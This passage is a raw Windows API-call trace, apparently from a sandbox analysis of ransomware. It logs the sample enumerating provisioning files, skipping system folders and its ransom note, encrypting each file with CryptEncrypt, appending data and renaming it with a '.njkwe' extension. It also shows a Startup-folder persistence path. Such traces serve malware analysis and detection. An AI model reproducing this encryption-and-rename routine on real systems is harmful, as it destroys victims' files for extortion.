(lpFirst="128__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0076.608] lstrcmpW (lpString1="128__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.608] lstrcmpW (lpString1="128__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0076.608] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\128__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.608] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\128__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\128__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.608] GetTickCount () returned 0x11537e5 [0076.608] GetTickCount () returned 0x11537e5 [0076.608] GetTickCount () returned 0x11537e5 [0076.608] GetTickCount () returned 0x11537e5 [0076.608] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.609] GetProcessHeap () returned 0xbe0000 [0076.609] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.609] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1c4, lpOverlapped=0x0) returned 1 [0076.609] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.610] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1c4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1c4, lpOverlapped=0x0) returned 1 [0076.610] GetProcessHeap () returned 0xbe0000 [0076.610] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.610] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.610] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.610] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.611] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.611] CloseHandle (hObject=0x43c) returned 1 [0076.611] GetProcessHeap () returned 0xbe0000 [0076.611] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.611] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\128__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0076.611] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\128__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\128__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\128__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\128__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.611] GetProcessHeap () returned 0xbe0000 [0076.611] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.611] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9051cd0d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9051cd0d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9051cd0d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2bd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="129__Connections_Cellular_Elisa (Finland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="129__C~1.PRO")) returned 1 [0076.611] lstrcmpiW (lpString1="129__Connections_Cellular_Elisa (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.611] lstrcmpiW (lpString1="129__Connections_Cellular_Elisa (Finland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.611] lstrcmpiW (lpString1="129__Connections_Cellular_Elisa (Finland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.611] lstrcmpiW (lpString1="129__Connections_Cellular_Elisa (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.612] lstrcmpiW (lpString1="129__Connections_Cellular_Elisa (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.612] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\129__Connections_Cellular_Elisa (Finland)_i0$(__MVID)@WAP.provxml") returned 159 [0076.612] StrStrIW (lpFirst="129__Connections_Cellular_Elisa (Finland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.612] lstrcmpW (lpString1="129__Connections_Cellular_Elisa (Finland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.612] lstrcmpW (lpString1="129__Connections_Cellular_Elisa (Finland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.612] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\129__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.612] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\129__Connections_Cellular_Elisa (Finland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\129__connections_cellular_elisa (finland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.612] GetTickCount () returned 0x11537e5 [0076.612] GetTickCount () returned 0x11537e5 [0076.612] GetTickCount () returned 0x11537e5 [0076.612] GetTickCount () returned 0x11537e5 [0076.612] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.612] GetProcessHeap () returned 0xbe0000 [0076.612] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.612] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2bd, lpOverlapped=0x0) returned 1 [0076.616] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd43, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.616] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2bd, lpOverlapped=0x0) returned 1 [0076.616] GetProcessHeap () returned 0xbe0000 [0076.616] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.616] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.616] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.616] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.616] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.616] CloseHandle (hObject=0x43c) returned 1 [0076.616] GetProcessHeap () returned 0xbe0000 [0076.616] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.616] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\129__Connections_Cellular_Elisa (Finland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0076.616] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\129__Connections_Cellular_Elisa (Finland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\129__connections_cellular_elisa (finland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\129__Connections_Cellular_Elisa (Finland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\129__connections_cellular_elisa (finland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.617] GetProcessHeap () returned 0xbe0000 [0076.617] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.617] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9013ce1d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9013ce1d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9013ce1d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="12__Connections_Cellular_Optus (Australia)_i3$(__MVID)@WAP.provxml", cAlternateFileName="12__CO~1.PRO")) returned 1 [0076.617] lstrcmpiW (lpString1="12__Connections_Cellular_Optus (Australia)_i3$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.617] lstrcmpiW (lpString1="12__Connections_Cellular_Optus (Australia)_i3$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.617] lstrcmpiW (lpString1="12__Connections_Cellular_Optus (Australia)_i3$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.617] lstrcmpiW (lpString1="12__Connections_Cellular_Optus (Australia)_i3$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.617] lstrcmpiW (lpString1="12__Connections_Cellular_Optus (Australia)_i3$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.617] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\12__Connections_Cellular_Optus (Australia)_i3$(__MVID)@WAP.provxml") returned 160 [0076.617] StrStrIW (lpFirst="12__Connections_Cellular_Optus (Australia)_i3$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.617] lstrcmpW (lpString1="12__Connections_Cellular_Optus (Australia)_i3$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.617] lstrcmpW (lpString1="12__Connections_Cellular_Optus (Australia)_i3$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.617] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\12__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.617] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\12__Connections_Cellular_Optus (Australia)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\12__connections_cellular_optus (australia)_i3$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.617] GetTickCount () returned 0x11537e5 [0076.618] GetTickCount () returned 0x11537e5 [0076.618] GetTickCount () returned 0x11537e5 [0076.618] GetTickCount () returned 0x11537e5 [0076.618] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.618] GetProcessHeap () returned 0xbe0000 [0076.618] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.618] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0076.623] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.623] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0076.624] GetProcessHeap () returned 0xbe0000 [0076.692] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.692] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.692] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.692] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.692] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.692] CloseHandle (hObject=0x43c) returned 1 [0076.692] GetProcessHeap () returned 0xbe0000 [0076.692] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.692] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\12__Connections_Cellular_Optus (Australia)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0076.692] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\12__Connections_Cellular_Optus (Australia)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\12__connections_cellular_optus (australia)_i3$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\12__Connections_Cellular_Optus (Australia)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\12__connections_cellular_optus (australia)_i3$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.693] GetProcessHeap () returned 0xbe0000 [0076.693] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.693] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9051cd0d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9051cd0d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9051cd0d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1d8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="130__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="130__C~1.PRO")) returned 1 [0076.699] lstrcmpiW (lpString1="130__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0076.699] lstrcmpiW (lpString1="130__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0076.699] lstrcmpiW (lpString1="130__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0076.699] lstrcmpiW (lpString1="130__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0076.699] lstrcmpiW (lpString1="130__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0076.699] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\130__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0076.700] StrStrIW (lpFirst="130__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0076.700] lstrcmpW (lpString1="130__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.700] lstrcmpW (lpString1="130__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0076.700] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\130__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.700] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\130__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\130__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.700] GetTickCount () returned 0x1153833 [0076.700] GetTickCount () returned 0x1153833 [0076.700] GetTickCount () returned 0x1153833 [0076.700] GetTickCount () returned 0x1153833 [0076.700] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.700] GetProcessHeap () returned 0xbe0000 [0076.700] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.700] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1d8, lpOverlapped=0x0) returned 1 [0076.701] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.701] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1d8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1d8, lpOverlapped=0x0) returned 1 [0076.701] GetProcessHeap () returned 0xbe0000 [0076.701] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.701] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.701] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.702] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.702] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.702] CloseHandle (hObject=0x43c) returned 1 [0076.702] GetProcessHeap () returned 0xbe0000 [0076.702] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.702] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\130__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0076.703] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\130__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\130__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\130__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\130__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.703] GetProcessHeap () returned 0xbe0000 [0076.703] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.703] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90542f74, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90542f74, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90542f74, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x29d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="131__Connections_Cellular_Go Communication Ltd. (Finland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="131__C~1.PRO")) returned 1 [0076.703] lstrcmpiW (lpString1="131__Connections_Cellular_Go Communication Ltd. (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.703] lstrcmpiW (lpString1="131__Connections_Cellular_Go Communication Ltd. (Finland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 